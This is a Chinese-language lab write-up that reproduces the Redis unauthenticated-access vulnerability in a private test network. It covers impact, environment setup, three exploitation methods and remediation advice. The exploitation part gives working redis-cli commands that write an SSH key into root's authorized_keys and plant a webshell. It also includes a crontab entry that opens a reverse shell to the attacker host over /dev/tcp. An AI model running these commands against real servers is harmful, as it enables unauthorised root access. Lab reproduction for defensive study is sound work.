Redis未授權訪問漏洞復現
一、漏洞描述
Redis默認情況下,會系結在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在這個模式下,非系結IP或者沒有配置密碼訪問時都會報錯),如果沒有進行采用相關的策略,比如添加防火墻規則避免其他非信任來源ip訪問等等,這樣將會將Redis服務暴露在公網上,如果在沒有設定密碼認證(默認為空)的情況下,會導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的資料,攻擊者在未授權訪問Redis的情況下,利用Redis自身的提供的config命令,可以進行寫檔案操作,攻擊者還可以成功將自己的ssh公鑰寫入目標服務器的/root/.ssh檔案的authotrized_keys 檔案中,進而可以使用對應私鑰直接使用ssh服務器登錄目標服務器,
漏洞的產生條件有以下兩點:
(1) Redis系結在0.0.0.0:6379,且沒有進行添加防火墻規則避免其他非信任來源ip訪問等相關安全策略,直接暴露在公網
(2) 沒有設定密碼認證(默認為空)或者弱密碼,可以免密碼登錄redis服務
二、漏洞影響版本
Redis 2.x,3.x,4.x,5.x
三、漏洞危害
(1) 攻擊者無需認證訪問到內部資料,可能導致敏感資訊泄露,黑客也可以惡意執行flushall來清空所有資料
(2) 攻擊者可通過eval執行lua代碼,或通過資料備份功能往磁盤寫入后門檔案
(3) 如果redis以root身份運行,黑客可以給root賬戶寫入SSH公鑰檔案,直接通過SSH登錄目標服務器
四、漏洞環境搭建
靶機:ubuntu 16.04 192.168.10.134
攻擊機:kali 192.168.10.138
1、靶機安裝redis服務器(redis-server)
1.1下載redis-4.0.10
wget http://download.redis.io/releases/redis-4.0.10.tar.gz
1.2、解壓,進入原始碼目錄,然后編譯(make、make install)
1.3啟動服務(redis-server)
1.3.1啟動redis服務,注意關閉防火墻,Ubuntu除了iptables機制,還有ufw安全機制
1.3.2啟動redis-server服務
1.4查看是否啟動了redis-server服務
ps -ef |grep redis-server
2.kali安裝安裝redis客戶端(redis-cli)
2.1下載redis-4.0.10
wget http://download.redis.io/releases/redis-4.0.10.tar.gz
2.2 解壓,編譯
2.3測驗redis客戶端是否安裝完成
五、漏洞復現
1、測驗目標靶機是否存在未授權訪問,下圖說明靶機存在未授權訪問,導致資訊泄露(注:由于redis-4.0.10版本中組態檔默認已經啟用了保護,下面將使用redis-2.8.17)
利用方式1:寫入webshell
利用條件:目標開啟了web服務器,并且知道web路徑(可以利用phpinfo或者錯誤暴路徑等),還需要具有讀寫增刪改查權限
2、把shell寫入到網站根目錄下(/var/www/html/)
3、在靶機上查看是否寫入了1.php檔案
4、瀏覽器訪問http://192.168.10.139/1.php,發現在目標靶機成功寫入webshell
5、寫入一句話木馬
6、菜刀連接, 注:在ubuntu環境測驗,菜刀一直決議不到上傳的木馬
利用方式2:通過寫入SSH公鑰實作SSH登錄
原理就是在資料庫中插入一條資料,將本機的公鑰作為value,key值隨意,然后通過修改資料庫的默認路徑為/root/.ssh和默認的緩沖檔案authorized.keys,把緩沖的資料保存在檔案里,這樣就可以在服務器端的/root/.ssh下生一個授權的key,
7、首先在攻擊機(kali)上生成ssh公鑰
8、將公鑰寫入key.txt檔案(前后用\n換行,避免和redis里其他快取資料混合),
(echo -e "\n";cat id_rsa.pub;echo -e "\n")>key.txt
9、再把key.txt檔案內容寫入redis緩沖
cat /root/.ssh/key.txt |./redis-cli -h 192.168.10.139 -x set pub
10.1、設定redis的dump檔案路徑為/root/.ssh且檔案名為authorized_keys,注意: redis 可以創建檔案但無法創建目錄,所以,redis 待寫入檔案所在的目錄必須事先存在,出現如下圖錯誤是因為目標靶機不存在.ssh目錄(默認沒有,需要生成公、私鑰或者建立ssh連接時才會生成)
10.2當目標使用過ssh服務之后,就會產生.ssh目錄了,然后進行如下操作
11、測驗是否可以通過ssh登錄目標服務器,成功登錄
利用方式3:在crontab里寫定時任務,反彈shell
12、在客戶端開啟監聽(kali攻擊機)
13、在客戶端(kali攻擊機)使用redis-cli連接redis服務器,寫入反彈shell
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.10.140/5555 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
14、1分鐘后客戶端這邊收到centos的反彈shell,注意:在ubuntu測驗計劃任務寫入成功但不執行
15、在目標靶機(centos)上查看計劃任務
六、修復建議
1、禁止外部訪問Redis服務埠
2、禁止使用root權限啟動redis服務
3、配置安全組,限制可連接Redis服務器的IP
-------------------------------------------------------------------------
參考: https://www.freebuf.com/column/158065.html
https://www.freebuf.com/vuls/148758.html
redis安裝: https://www.jianshu.com/p/2f53c9a4b4c6
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/61964.html
標籤:其他
上一篇:Joomla 3.0.0 -3.4.6遠程代碼執行(RCE)漏洞復現
下一篇:【網路安全】加解密演算法最詳解